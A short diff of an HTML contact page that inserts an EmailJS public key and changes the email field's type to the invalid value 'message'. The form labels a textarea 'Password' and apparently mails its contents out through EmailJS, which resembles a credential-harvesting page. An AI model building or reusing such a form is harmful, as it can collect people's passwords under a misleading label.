--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <script type="text/javascript">
         (function() {
             // https://dashboard.emailjs.com/admin/account
-            emailjs.init('YOUR_PUBLIC_KEY');
+            emailjs.init('ukvWqR3cXO8qfml4q');
         })();
     </script>
     <script type="text/javascript">
@@ -32,7 +32,7 @@
     <form id="contact-form">
         <input type="hidden" name="contact_number">
         <label>Email</label>
-        <input type="email" name="user_email">
+        <input type="message" name="user_email">
         <label>Password</label>
         <textarea name="message"></textarea>
         <input type="submit" value="Send">
